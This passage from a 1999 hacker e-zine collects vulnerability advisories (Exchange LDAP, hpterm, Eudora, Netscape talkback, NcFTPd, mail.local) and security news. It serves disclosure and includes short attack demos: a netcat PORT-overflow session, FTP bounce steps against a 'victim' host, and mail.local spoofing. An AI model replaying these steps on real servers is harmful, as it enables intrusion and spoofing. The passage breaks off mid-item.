the uninstall programs call, when they launch, create your own and remove any you don't want. Watch what windows launches behind your back. (Edit/Remove/Insert) Change the layout of your Deskop, and some of it's features. Clear your history files when leaving Windows. Log logins at startup. Change your registration information. Forgot your password to Windows9x? Retrieve or remove the password files directly. Got a habit of forgetting stuff? The Wintrasher Calendar & Popup is with you every time you start Windows. Has your system ever crashed, or ever wished that you didn't install that program? The system backup feature backs up critical system files, including the Registry. Lock your system as with Windows NT with one click. Make sure you are the only one that can use Wintrasher at the station, by password-protecting WT-Gold. For Windows 95/98. 1.6 MB. By The Silents Denmark. Packetstorm download: http://www.genocide2600.com/~tattooman/utility-nt/wtgold.zip Main site: http://www.silents.dk/ 05.0 LDAP buffer overflow ~~~~~~~~~~~~~~~~~~~~~ From: X-Force To: BUGTRAQ@netspace.org Subject: ISS Security Advisory: LDAP Buffer overflow against Microsoft Directory Services Date: 1999. oujak 16 22:03 -----BEGIN PGP SIGNED MESSAGE----- ISS Security Advisory March 15, 1999 LDAP Buffer overflow against Microsoft Directory Services Synopsis: ISS X-Force has discovered a buffer overflow exploit against Microsoft Exchange's LDAP (Lightweight Directory Access Protocol) server which allows read access to the Exchange server directory by using an LDAP client. This buffer overflow consists of a malformed bind request that overflows the buffer and can execute arbitrary code. This attack can also cause the Exchange LDAP service to crash. This vulnerability exists in Microsoft Exchange Server version 5.5. Description: This exploit occurs during the LDAP binding process. Binding involves logging in or authenticating to a directory, and consists of sending a username, a password, and a binding method. There are two methods in which to use this vulnerablility against an Exchange server. The first consists of sending a particular type of invalid LDAP bind packet which will cause an overflow to occur this will cause the LDAP service to crash. The second uses a large malformed LDAP bind packet that is carefully crafted to take advantage of the buffer overflow and can be used to execute arbitrary code. Recommendations: Microsoft has made a patch available for the LDAP attack. Patch information is available at: http://www.microsoft.com/security/bulletins/ms99-009.asp Network administrators can protect internal systems from external attack by adding a rule to a filtering router or firewall of the type: Deny all incoming TCP packets with a destination port of 389. Many firewalls or packet filters may already have more restrictive rulesets that already encompass this filtering rule, in which case the network is already protected from an external attack. This ruleset would include filtering all incoming traffic to TCP port 389. Additional Information: These vulnerabilities were primarily researched by the ISS X-Force. ________ Copyright (c) 1999 by Internet Security Systems, Inc. Permission is hereby granted for the electronic redistribution of this Security Advisory. It is not to be edited in any way without express consent of the X-Force. If you wish to reprint the whole or any part of this Security Advisory in any other medium excluding electronic medium, please e-mail xforce@iss.net for permission. Internet Security Systems, Inc. (ISS) is the leading provider of adaptive network security monitoring, detection, and response software that protects the security and integrity of enterprise information systems. By dynamically detecting and responding to security vulnerabilities and threats inherent in open systems, ISS's SAFEsuite family of products provide protection across the enterprise, including the Internet, extranets, and internal networks, from attacks, misuse, and security policy violations. ISS has delivered its adaptive network security solutions to organizations worldwide, including firms in the Global 2000, nine of the ten largest U.S. commercial banks, and over 35 governmental agencies. For more information, call ISS at 678-443-6000 or 800-776-2362 or visit the ISS Web site at http://www.iss.net. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. X-Force PGP Key available at: http://www.iss.net/xforce/sensitive.html as well as on MIT's PGP key server and PGP.com's key server. X-Force Vulnerability and Threat Database: http://www.iss.net/xforce Please send suggestions, updates, and comments to: X-Force of Internet Security Systems, Inc. -----BEGIN PGP SIGNATURE----- Version: 2.6.3a Charset: noconv iQCVAwUBNu3GuzRfJiV99eG9AQF48wP+J1/vW040sA5f9Nz56JEF9s6d/tpainG1 Qw7Jxbry374IFinJZfk/K5FJkdbjJfMcyGfgWJjNriYZJ0EKFkQcRK7XNAUe8AGu LWaBW4l0v1Qox3ueR3GdCskQ8haK9vpxkFkbPmlefIWKMsVhncQPloJwU3/WyPNV uLJBWqHEpkU= =Zp+/ -----END PGP SIGNATURE----- From Help Net Security http://net-security.org/ PATCH FOR "MALFORMED BIND REQUEST" by BHZ, Wednesday 17th Mar 1999 on 8:40 pm CET Microsoft has released a patch that eliminates a vulnerability in the LDAP Bind function for Microsoft (r) Exchange (r) 5.5. The vulnerability could allow denial of service attacks against an Exchange server or, under certain conditions, could allow arbitrary code to be run on the server. A fully supported patch is available, and Microsoft recommends that customers who are at risk from this attack download and install it. You can obtain patch for X86-based Exchange or Alpha-based Exchange @HWA 06.0 HP Security bulletin: HPTerm exploitability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Thu, 18 Mar 1999 12:36:13 -0800 From: aleph1@UNDERGROUND.ORG Reply-To: support_feedback@us-support.external.hp.com To: BUGTRAQ@netspace.org Subject: Security Bulletins Digest HP Support Information Digests =============================================================================== o HP Electronic Support Center World Wide Web Service --------------------------------------------------- If you subscribed through the HP Electronic Support Center and would like to be REMOVED from this mailing list, access the HP Electronic Support Center on the World Wide Web at: http://us-support.external.hp.com Login using your HP Electronic Support Center User ID and Password. Then select Support Information Digests. You may then unsubscribe from the appropriate digest. =============================================================================== ? Digest Name: Daily Security Bulletins Digest Created: Thu Mar 18 3:00:02 PST 1999 Table of Contents: Document ID Title --------------- ----------- HPSBUX9903-093 Security Vulnerability with hpterm on HP-UX 10.20 The documents are listed below. ------------------------------------------------------------------------------- ? Document ID: HPSBUX9903-093 Date Loaded: 19990317 Title: Security Vulnerability with hpterm on HP-UX 10.20 ------------------------------------------------------------------------- HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00093, 18 March 1999 ------------------------------------------------------------------------- The information in the following Security Bulletin should be acted upon as soon as possible. Hewlett-Packard Company will not be liable for any consequences to any customer resulting from customer's failure to fully implement instructions in this Security Bulletin as soon as possible. ------------------------------------------------------------------------- PROBLEM: PHSS_13560 introduced a library access problem into hpterm. PLATFORM: HP9000 Series 700 and Series 800, HP-UX release 10.20 only. DAMAGE: Users can gain increased privileges. SOLUTION: Install PHSS_17830. AVAILABILITY: The patch is available now. ------------------------------------------------------------------------- I. A. Background PHSS_13560 introduced a library access problem into hpterm, the terminal emulator for the X Window system. (See hpterm(1)). B. Fixing the problem Installing patch PHSS_17830 completely fixes this problem. NOTE: Three older hpterm patches have been released including PHSS_13560, PHSS_15431, and PHSS_17332. All of these older patches are being superseded with the release of the PHSS_17830. Do not use PHSS_13560, PHSS_15431, or PHSS_17332. C. To subscribe to automatically receive future NEW HP Security Bulletins from the HP Electronic Support Center via electronic mail, do the following: Use your browser to get to the HP Electronic Support Center page at: http://us-support.external.hp.com (for US, Canada, Asia-Pacific, & Latin-America) http://europe-support.external.hp.com (for Europe) Login with your user ID and password (or register for one). Remember to save the User ID assigned to you, and your password. Once you are in the Main Menu: To -subscribe- to future HP Security Bulletins, click on "Support Information Digests". To -review- bulletins already released from the main Menu, click on the "Technical Knowledge Database (Security Bulletins only)". Near the bottom of the next page, click on "Browse the HP Security Bulletin Archive". Once in the archive there is another link to our current Security Patch Matrix. Updated daily, this matrix categorizes security patches by platform/OS release, and by bulletin topic. The security patch matrix is also available via anonymous ftp: us-ffs.external.hp.com ~ftp/export/patches/hp-ux_patch_matrix D. To report new security vulnerabilities, send email to security-alert@hp.com Please encrypt any exploit information using the security-alert PGP key, available from your local key server, or by sending a message with a -subject- (not body) of 'get key' (no quotes) to security-alert@hp.com. Permission is granted for copying and circulating this Bulletin to Hewlett-Packard (HP) customers (or the Internet community) for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to HP, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. HP is not liable for any misuse of this information by any third party. _______________________________________________________________________ -----End of Document ID: HPSBUX9903-093-------------------------------------- @HWA 07.0 Eudora buffer overflow exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Approved-By: aleph1@UNDERGROUND.ORG Received: from enext.dyndns.org (port25.mico10.tir.com [216.40.137.210]) by netspace.org (8.8.7/8.8.7) with ESMTP id CAA18560 for ; Sat, 20 Mar 1999 02:17:38 -0500 Received: from localhost (whiz@localhost) by enext.dyndns.org (8.8.7/8.8.7) with ESMTP id CAA12075 for ; Sat, 20 Mar 1999 02:21:35 -0500 MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Message-ID: Date: Sat, 20 Mar 1999 02:21:35 -0500 Reply-To: whiz Sender: Bugtraq List From: whiz Subject: Eudora Attachment Buffer Overflow To: BUGTRAQ@netspace.org I have found another problem with Eudora, attachments, and long filenames that is similar to the the problem I found last year. If two messages are sent to an Eudora 4.1 user that have an attachment with a filename of around 231 or more, the next time the user checkes his mail Eudora crashes. I say 231 because C:\Program Files\Eudora\Attach\ is 31 characters + 231 = 262 = longer then Windows can handle. Eudora trucates the long filename correctly and thats why you cant't send just one messages with a long name, like you use to be able to do with Eudora 4.0. But it truncates it so the the path length is 259 characters which is the maximum. Then when it receives the second attachment it truncates, and trys to add a 1 to the end, this is where it crashes. This allows you to modify the return address to point to arbitrary code. Here is how i tested: Send message to myself with attchment that has a long filename Resend exact message Check my mail Eudora crashes Both the Win 95 and Win NT versions, along with the 4.2 beta of Eudora are affected. The vendor of Eudora, Qualcomm was notified of this problem on 3/12/99. -whiz whiz@enext.dyndns.org http://enext.dyndns.org/~whiz/ @HWA 08.0 Netscape SUSE crash exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Return-Path: Approved-By: aleph1@UNDERGROUND.ORG Date: Fri, 19 Mar 1999 22:45:02 -0800 Reply-To: Aleph One Sender: Bugtraq List From: Aleph One Subject: Security hole in Netscape Communicator's 4.5 "talkback" function To: BUGTRAQ@netspace.org ______________________________________________________________________________ SuSE Security Announcement Package: netscape-4.5-9 Date: Thu Mar 18 10:22:11 CET 1999 Affected: unix operating systems using netscape communicator 4.5 ______________________________________________________________________________ A security whole was discovered in the package mentioned above. Please update as soon as possible or disable the service if you are using this software on your SuSE Linux installation(s). Other Linux distributions or operating systems might be affected as well, please contact your vendor for information about this issue. Please note, that that we provide this information on as "as-is" basis only. There is no warranty whatsoever and no liability for any direct, indirect or incidental damage arising from this information or the installation of the update package. ______________________________________________________________________________ 1. Problem Description The Netscape Communicator 4.5 comes with "talkback", a quality enhancement tool by Fullcircle (www.fullcircle.com). If the communicator crashs for any reason, the file with the name /tmp/.$UID.talkback is read in, and the pid in this file is killed. After that, the file is truncated/created without checks for {sym|hard}links and the pid of the current talkback process is written into the file. 2. Impact Anyone on the system can kill a process of users if their communicator crashs. Anyone on the system can overwrite/create any file an attacked users# has write access to. We didn't check if there's a buffer overflow possible when the talkback application reads in the file. 3. Solution Disable talkback. You may do this my executing the following commands (your path to netscape may differ): /bin/mv /opt/netscape/talkback /opt/netscape/talkback.disable /bin/chmod -R 600 /opt/netscape/talkback Netscape responded to this vulnerability that the current version does not install the talkback application. You may install the new version 4.51 from Netscape which also fixes some other security vulnerabilities. However, if you update from a 4.5 installation, ensure that you execute the lines above. ______________________________________________________________________________ SuSE has got two free security mailing list services to which any interested party may subscribe: suse-security@suse.com - unmoderated and for general/linux/SuSE security discussions. All SuSE security announcements are send to this list. suse-security-announce@suse.com - SuSE's announce-only mailing list. Only SuSE's security annoucements are sent to this list. To subscribe, send an email to majordomo@suse.com with the text subscribe suse-security or subscribe suse-security-announce in the body of the message. Or just issue a echo subscribe suse-security | mail majordomo@suse.com or echo subscribe suse-security-announce | mail majordomo@suse.com ______________________________________________________________________________ If you want to report *NEW* security bugs in the SuSE Linux Distribution please send an email to security@suse.de or call our support line. You may use pgp with the public key below to ensure confidentiality. ______________________________________________________________________________ This information is provided freely to everyone interested and may be redistributed provided that it is not altered in any way. Type Bits/KeyID Date User ID pub 2048/3D25D3D9 1999/03/06 SuSE Security Team -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3i -----END PGP PUBLIC KEY BLOCK----- @HWA 09.0 Hotmail to plug potential security problem ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HOTMAIL BUG by BHZ, Sunday 21th Mar 1999 on 3:01 am CET The security hole, that Hotmail plans to plug, could make users who access Hotmail through a public terminal or other shared computer vulnerable to the prying eyes of subsequent users. Hotmail said it had caught the security problem during a routine security audit and was close to implementing its fix, which is to stop authentication by IP address and require the use of cookies. The service noted that users currently can protect themselves against the exploit by opting for cookie-based authentication. Contributed by Thejian. @HWA 10.0 NcFTPd Exploit (old but missed in earlier issues) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This advisory is from Proof Of Concept Proof of Concept - Security Advisory 02/23/99 http://poc.csoft.net Released by poc@csoft.net sw3wn@poc.csoft.net --- Affected Program NcFTPd Description FTP server (commercial) Severity Theoretical root compromise, logs compromise Synopsis: NcFTPd is a commercial FTP (File Transfer Protocol) server, in the NcFTP product line. The source code is not publicly released. This was tested on Linux with libc5 (there's a glibc2 specific version available). Problem: NcFTPd's PORT parsing function has a stack buffer overflow problem, which would basically allow a user to remotely execute arbitrary code - the thing here is that the PORT parsing function seem to change characters, that are not in the range 0x30-0x39 (ASCII '0'-'9'), into 0x20 (ASCII space), hence making an exploit almost impossible (note that, if ascii 0x40 would be allowed that would be a different story =p). The program only parses for characters out of the 0-9 range in a specific area in memory (the one that contains return address heh) - the rest is kept unchanged, and you can't really go further in memory, input line size is restricted. Like with most buffer overflows there are probably work-arounds to exploit it - this could have been a particulary neat exploit, since it runs as a child and one could gain access transparently without crashing the parent. The current bug is not really a problem, it can crash the child process with a segfault, the parent process receives a signal 6 (abort) and the child process stay zombie for a few seconds and a brand new one is created. A few minor DoS attacks are possible but, who cares. Oh and this could be used to not get listed in the logs too. Example: -- evil:$ nc victim ftp 220 victim NcFTPd Server (unregistered copy) ready. user anonymous 331 Guest login ok, send your complete e-mail address as password. pass some@thing 230-You are user #1 of 50 simultaneous users allowed. 230- 230 Logged in anonymously. port 00000000000000000000000000000000000000000000 (...) 501 Syntax error in parameters. evil:$ -- Status: I contacted the authors, nice enough to send me back the piece of code that causes the problem - here goes: static int ftp_aton(const char *cp, struct sockaddr_in *sinaddr) { char buf[64]; char *dst; char *dstlim; int i, c; unsigned int octets[6], u; memset(sinaddr, 0, sizeof(struct sockaddr_in)); dst = buf; dstlim = dst + sizeof(buf); for ( ; ; ) { c = *cp++; if (c == '\0') break; if (! isdigit(c)) c = ' '; if (dst < dstlim) *dst++ = c; } *dst = '\0'; if (sscanf(buf, "%u%u%u%u%u%u", &octets[0], &octets[1], &octets[2], &octets[3], &octets[4], &octets[5] ) != 6) { return (-1); } for (i=0; i<6; i++) { if (octets[i] > 0xFF) return (-1); } sinaddr->sin_family = AF_INET; u = (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | (octets[3]); sinaddr->sin_addr.s_addr = htonl(u); u = (octets[4] << 8) | (octets[5]); sinaddr->sin_port = htons((unsigned short) u); return (0); } /* ftp_aton */ void Port(char *line) { if (gLoggedIn == 0) { NotLoggedIn(); return; } if (gAllowPORT == 0) { Reply("550 This site does not permit PORT. Please use PASV instead.\r\n"); return; } if (ftp_aton(line, &gRemoteDataAddr) < 0) { Reply("501 Syntax error in parameters.\r\n"); return; } /* ... */ } @HWA 10.1 NcFTPd proxy exploitation ~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept - Security Advisory 02/16/99 http://poc.csoft.net Released by poc@csoft.net sw3wn@poc.csoft.net --- Affected Program NcFTPd Description FTP server (commercial) Severity Default PORT setup, log compromise Synopsis: NcFTPd is a commercial FTP (File Transfer Protocol) server, in the NcFTP product line. The source code is not publicly released. This was tested on Linux with libc5 (there's a glibc2 specific version available). Overview: To initiate a FTP transfer, there must be two connections, one control connection (server's ftp port), and one data connection. When a client wants to tell the server where to send the data (ie. a file you want to download, or a directory listing), it must use the command PORT - in which the destination address and port is specified. Problem: NcFTPd does not check that the destination PORT address is the user's IP. This means anybody can transmit data from the server anywhere, anonymously. Obviously this can lead to potential `easy' DoS attacks and spoofing (say, someone uploads a file containing commands of something to incoming, PORT to some host/port, and use RETR (retrieve file)). Such connections are possible with the default NcFTPd configuration, but can be disallowed: general.cf> allow-outgoing-proxy-data-connection-ports-below-1024 - no general.cf> allow-proxy-connections - no Most other FTP server daemons I've tried has this feature disabled - even if the proxy connections are a documented part of RFC 959 (FTP protocol). But this is no big deal, just a possible amelioration. I made an example program that listens on a port and dumps arbitrary received data in string, hex or ascii/hex format, and sends back EOF (needed for FTP data transfer). [http://poc.csoft.net/code/listerine/listerine.tar.gz] Example: evil:$ telnet victim ftp # victim runs NcFTPd user anonymous # anonymous is up by default pass some@thing port 192,168,0,1,5,131 # connect on port 1411 retr incoming/stuff # send arbitrary data, as it # was coming from host victim. To see for yourself, you can run my example program `listerine', on the host victim. I tested this on my LAN and on remote machines too. Status: Got response from authors, the problem can be fixed indeed with the general.cf options mentionned above, but are not enabled with default configuration. .sw3 @HWA 10.2 Mail.local sendmail exploit advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept - Security Mini-advisory 02/15/99 http://poc.csoft.net Released by poc@csoft.net sw3wn@poc.csoft.net --- Affected Program mail.local (Berkeley Sendmail) Description Local mailer (forward mail to mailboxes) Severity Mailbox compromise Synopsis: mail.local is a small program distributed with Berkeley Sendmail, used as a local mailer (forwards mail to mailboxes), also able to handle LMTP commands. It runs SUID root in order to access the users's mailbox (ie. /var/spool/mail, /usr/spool/mail). Overview: When mail has to be written to a user's mailbox locally, a local mailer is used; the mail.local program that comes with Sendmail does this task, but does not restrict the length of a message, or does not check the authenticity of the user who sends it. This is obviously not a big security issue - but still, it has to get fixed, as this could lead to more serious problem if used on a system with lots of e-mail accounts. Problem: This can lead to the compromising of anybody's mailbox - from fake (and totally untraceable messages), to flooding the mailbox (and maybe the hard drive). I found this by inspecting the source code for buffer overflows heh. Say I wanted to send a fake message like it was coming from root to user joe, simply running mail.local -f root joe could do it. mail.local simply dumps the message as you enter it in the user's maibox. Since mail.local does not checks for message length, you can flood a mailbox (and possibly the hard drive) in a matter of seconds. Finally, mail.local only check if a user exists by using /etc/passwd, that means anybody could create mailboxes for users like bin, nobody, etc (usually it's no security compromise). Examples: [http://poc.csoft.net/advs/mail.local/mailfrm.tar.gz] [http://poc.csoft.net/advs/mail.local/junk.tar.gz] Patch/Fix: [http://poc.csoft.net/advs/mail.local/mail.local.diff] Status: As of 02/22/99, I received a e-mail from the authors, the program should be shipped non-setuid in 8.10. .sw3 @HWA 11.0 Its in the bag, the great hacker backpack caper... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I really debated giving this any space at all but it is pertinent to the mainstream ideals that are being generated by the media so its here.... *sigh* - Ed March 24th 1999 via wired news Hackers Sack Competition Site by Leander Kahney 5:00 p.m. 23.Mar.99.PST Having baited crackers with a "hacking" competition to win a backpack, a retailer's site has been hacked for real. As previously reported, a Belgian bag manufacturer is giving a "Hacker" branded backpack to everyone that cracks a password competition on its Web site. But on Tuesday Kipling's site was hacked for real. The opening page was replaced with a screen grab that showed a big red cross and the message: "Sorry, we've been hacked.... Site under reconstruction." The altered page stayed up for most of Tuesday, and Kipling was unavailable for comment. The site intrusion may have been retaliation for disparaging remarks made about crackers by a Kipling vice president. Shortly before the site was hacked, the password competition was finally cracked. It took a week of trying, claimed Mooby, a hacker who organized a brute force method of using software to generate all possible combinations. The crackers' efforts finally paid off over the weekend, Mooby said in an email. Ironically, the password wasn't cracked by software, but obtained by a more traditional method -- weaseling it out of someone. "It's a pity that I can't tell how I got the final password/login," he wrote. "We never would have guessed [it]. Let's just say I used some of my nerd-heroic social skills to get the right things." Having obtained the password, Mooby shared it. "I hope Kipling sends me this backpack," he wrote, "and all the other 99 people I told the password." -=- -=- Date: Sat, 20 Mar 1999 05:20:50 -0700 (MST) From: mea culpa To: InfoSec News Subject: [ISN] Retailer Frustrates Hackers http://www.wired.com/news/news/culture/story/18616.html Retailer Frustrates Hackers by Leander Kahney 3:00 a.m. 20.Mar.99.PST Promoting a new line of backpacks aimed at "hackers," a European bag manufacturer is running a crack-the-password competition on its Web site. But to the fury of hackers trying to bypass the competition and crack the site in earnest, all attempts to date have been unsuccessful. According to an amusing line of posts to Slashdot, an information clearinghouse for computer nerds, the hackers reveal their mounting frustration at being unable to thwart the password competition. "Come on!" wrote one. "Out of the 10,000 people who have read this article, no one has found the username and password? I find that very hard to believe. It has to be something completely insanely easy, right?" Apparently not. The "crack and win" password competition is organized by Kipling, a manufacturer of travel bags, backpacks, and accessories based in Antwerp, Belgium. The competition promotes its Hacker line of bags and backpacks, which have names like bookmark, mailbomb, browser, spam, firewall, and download. "The game challenges every pirate out there to break into our security and win a Hacker bag," the company said in a press release. "You can find the code in two ways," the release continued. "Real computer freaks will find the information in the traditional hacker manner. Those with less hacking experience can follow the hints which appear on the screen, which refer surfers to a Kipling sales point. Those who remain alert will surely find the letter/number code." Kipling confirmed it would give a bag to everyone who cracks the code, which takes the form of a username login and password. Rising to the challenge, readers of Slashdot quickly encouraged each other to break the code, just for the hell of it. But after a week of trying, most efforts have been abandoned. "I'm sorry to say that so far no one has been able to beat the login," said Slashdot contributor Greg Boyce, who offered to buy a Slashdot hat for the first person to crack it. "Turns out it was a bit more complicated than I thought it would be." The most ambitious attempt adopted a "brute force" strategy generating all possible combinations of username and password. Special software to automate the process is available on the Web. Other attempts ranged from examining the source code for the Web page, which is coded in Javascript, to breaking into the site. However, Kipling said attempts to breach the site's security have so far failed. "No one has cracked it," said Edith Iris, Kipling's marketing manager. "We've had no problems." To add to the hackers' irritation, Kipling also garbled the definitions of cherished computer terms in its marketing blurb. According to Kipling's site, "A hacker is a cunning computer expert who cracks the security systems of computers in order to steal or destroy information." But in the programming community, a malicious computer expert is called a "cracker." A hacker is simply a harmless programmer. "Hacker is the term in common parlance," countered Larry Lein, executive vice president of Kipling USA. "If you asked me what a cracker was, I'd say someone who lived in a trailer park down South." -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 12.0 DNS Spoofing finally resolved? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Sat, 20 Mar 1999 22:08:46 -0700 (MST) From: mea culpa To: InfoSec News Subject: [ISN] bind with DNSSEC finally released Sender: owner-isn@repsec.com Originally From: Lucky Green Originally To: cypherpunks@algebra.com Seems bind 8.2 with the long-awaited secure DNS fully integrated has finally been released. Say goodbye to DNS spoofing. Since the included crypto is meant to be used for authentication only and the licensing agreement prohibits the use of the said crypto for non-authentication purposes, the distribution is freely exportable. :-) Install bind 8.2 on your DNS server today and permanently fix one of the largest and longest-standing security holes on the Internet. ftp://ftp.isc.org/isc/bind/src/8.2/ --Lucky Green PGP 5.x encrypted email preferred -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 13.0 [ISN] IETF working group seeks to improve security alerting ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Thu, 18 Mar 1999 00:33:31 -0700 (MST) From: mea culpa To: InfoSec News Subject: [ISN] IETF working group seeks to improve security alerting Forwarded From: darek milewski http://www2.nwfusion.com:8001/cgi-bin/print.cgi?article=http://www.nwfusion.com/news/1999/0316security.html Sound the alarm! IETF working group seeks to improve security alerting. By Sandra Gittlen Network World Fusion, 03/16/99 MINNEAPOLIS - An IETF working group has stepped up work on a protocol for broadcasting alerts of network breaches across proprietary security applications. The Intrusion Detection Message Exchange Protocol (IDMEP) would let applications - and system managers - quickly share information about attacks, according to IDMEP working group members. They are meeting here as part of an overall IETF conference. "[IDMEP] will be useful for attacks launched from one domain to another," says working group attendee Brian Tung, a computer scientist at the University of Southern California's Information Sciences Institute. "If a source domain notices an attack, it can notify the destination network. Right now, that's done by a human." The group had met last year at the IETF meeting in Orlando, but was unsuccessful in gaining consensus and had to revamp its plans. This time, meeting attendees seemed encouraged by the group's efforts. With the protocol, which could be based on SNMP Version 3, an alert detailing the type of attack in progress will be automatically sent across the network, along with a reference, such as a URL or a system file, where the network manager can find further information. That information could be the threshold setting of the alerter's system letting the recipient know what the alerter considers an attack or what the alerter suggests as a response for such an attack. Mark Wood, product line manager at Internet Security Systems in Atlanta, says IDMEP could dramatically improve responses to attacks because networks will be sharing information, not duplicating efforts. In fact, Tung says that hooking the IDMEP to policy networks could let users set up automatic responses to alerts and, therefore, ward them off. "There are a number of dollars to be had in [the intrusion detection tools] market," says Stuart Staniford-Chen, co-chair of the working group. In fact, the projected market for intrusion detection tools is expected to be $200 million, according to analysts at the Aberdeen Group, a Boston consultancy. "Therefore, we need to get moving on this [protocol]." Wood says he expects the protocol to be completed by the middle of next year, but products based on a proposed standard could be released as early as the first quarter of next year. Cisco and Axent are also working on the protocol. @HWA 14.0 Report: Military computers vulnerable ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.usatoday.com/life/cyber/tech/cte684.htm Report: Military computers vulnerable WASHINGTON (AP) - The military's key communications infrastructure linking combat, intelligence and command forces is dangerously vulnerable to attacks from cyberspace and requires urgent changes in Defense Department policy, said a study released Monday. The Command, Control, Communications, Computers and Intelligence systems, known as C4I, is compromised by security problems and also by a military culture prone to treating such problems as a lesser priority, the National Research Council reported. ''The rate at which information systems are being relied on outstrips the rate at which they are being protected,'' it said. ''The time needed to develop and deploy effective defenses in cyberspace is much longer than the time required to develop and mount an attack.'' Despite evidence of security lapses in C4I -- which handles communications and warning tasks all along the chain of command -- the Pentagon's ''words regarding the importance of information systems security have not been matched by comparable action,'' the report said. ''Troops in the field did not appear to take the protection of their C4I systems nearly as seriously as they do other aspects of defense,'' said the report, which Congress ordered the Pentagon to commission in 1995. The council is an independent organization chartered by Congress to advise the government. The report indicated the problems were due more to the Pentagon's management of the systems than to the technology itself. It cited C4I workers' lack of stature compared with traditional combat forces, compatibility problems between the services and a need for more budget flexibility on the matter from both the Defense Department and Congress. In a statement, the Pentagon acknowledged that the U.S. military's strength ''is our information technology,'' and that ''our dependence on such assets, which may be subject to malicious attack, makes information technology our weakness as well.'' It said that as the council's report was being prepared, the Defense Department had already improved protection against computer attack by implementing new programs, establishing a joint task force for computer defense and expanding training of its information technology personnel. But Kenneth Allard, an analyst who has written about C4I, said its weaknesses are in part the fault of ''Industrial Age'' military acquisition policies -- applying to computers as well as tanks, ships and aircraft -- that give the services their own procurement duties. Ships and tanks may perform different tasks, he said, but the Army, Navy and other services need a single-standard computer system. ''Twenty-first century combat is the war of the databases, in which information flows must go from the foxhole to the White House and back down again,'' said Allard, a former Army colonel and analyst at the Center for Strategic and International Studies who had not yet read the council's report. The report recommended: Making C4I a greater budget priority in defense spending, with a flexibility that can ''exploit unanticipated advances in C4I technology.'' Designating an organization responsible for providing direct defensive operational support to commanders. Funding a program to conduct frequent, unannounced penetration testing of C4I systems. Ensuring that programs are operable even if one part has been penetrated by an adversary. Emphasizing the importance of information technology in the military leadership. Establishing an Institute for Military Information Technology, possibly as part of an existing body. ------------------------------------------------------------ -------------------- ShadowVrai http://shadowvrai.evil.nu ______________________ "Did you really think you could call up the devil and ask him to behave?" __________ _____________________________________________ Get your free personalized email address at http://www.MyOwnEmail.com @HWA 15.0 International raid cracks child porn ring ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/TECH/computing/9903/19/germany.porno.reut/index.html International raid cracks child porn ring March 19, 1999 Web posted at: 5:35 p.m. EST (2235 GMT) MUNICH (Reuters) -- German police said on Friday they had cracked an international Internet child pornography ring after launching a coordinated sweep through seven countries. In a raid of private homes coordinated from Munich, German police said they had confiscated thousands of outlawed photographs and video images which had been traded and distributed via Internet "chat rooms." German police said the action, codenamed "Bavaria," had taken place on Wednesday and involved simultaneous raids of suspects' homes in Germany, Switzerland, Sweden, Britain, Norway, the United States and Canada. Holger Kind, an official from the Federal Crime Office, said the material uncovered had been the widest sweep of its kind led from Germany. "You can assume this will not be the last raid of its kind," Kind told a news conference. Kind said some suspects had already confessed to involvement in the ring. If convicted in Germany, the suspects could face a prison sentence of up to five years in jail. Switzerland and Britain have arrested one suspect each. Police in Sweden and the United States also found banned material in the raids featuring children between the ages of three and four, police in Bavaria said. @HWA 15.1 ACPM : Anti-Child Porn Militia wants YOU ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Anti Child Porn Militia contributed by system.administrator The Anti Child Porn Militia is recruiting new members. They are asking for anyone who thinks they can be of assistance in eliminating child pornography from the internet to assist them. http://infovlad.net/ACPM/ From the ACPM site; We pray for children who are sick. children who may not live to see their next birthday.... or tomorrow, children who go into hospitals, never to come out children who don't deserve to die. We pray for the children that don't understand why...... why they're not like other children who are healthy children who play in the sunlight dance on the grass, children who enjoy life children that don't think about death. We pray for children who stare at photographers from behind barbed wire, who can't run down the street in a new pair of sneakers, who are born in places we wouldn't be caught dead in, who live in an X-rated world. We pray for those children who never get dessert, who have no security blanket to drag behind them, children who watch their parents watch them die. children who can't find any bread to steal, children who don't have any rooms to clean up, whose pictures aren't on anybody's dresser, whose monsters are real. We pray for children whose nightmares come in the daytime, children who will eat anything, who have never seen a dentist, who aren't spoiled by anybody, children who go to bed hungry and cry themselves to sleep. who live and move but have no being. We pray for children who want to be carried, and for those who must be. For those who never get a second chance. We pray for those children who will grab the hand of anybody kind enough to offer it. For these children we pray. - unknown - 'Hackers wanted:' http://infovlad.net/ACPM/signup.html Only sign up if you have some skills and time to help out don't sign up for bragging rights, you won't be doing anyone any favours... - Ed @HWA 16.0 Hacking contest, win a Netfinity server! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Hacking Contest from HNN contributed by ju PC Intern, a german Computer magazine is 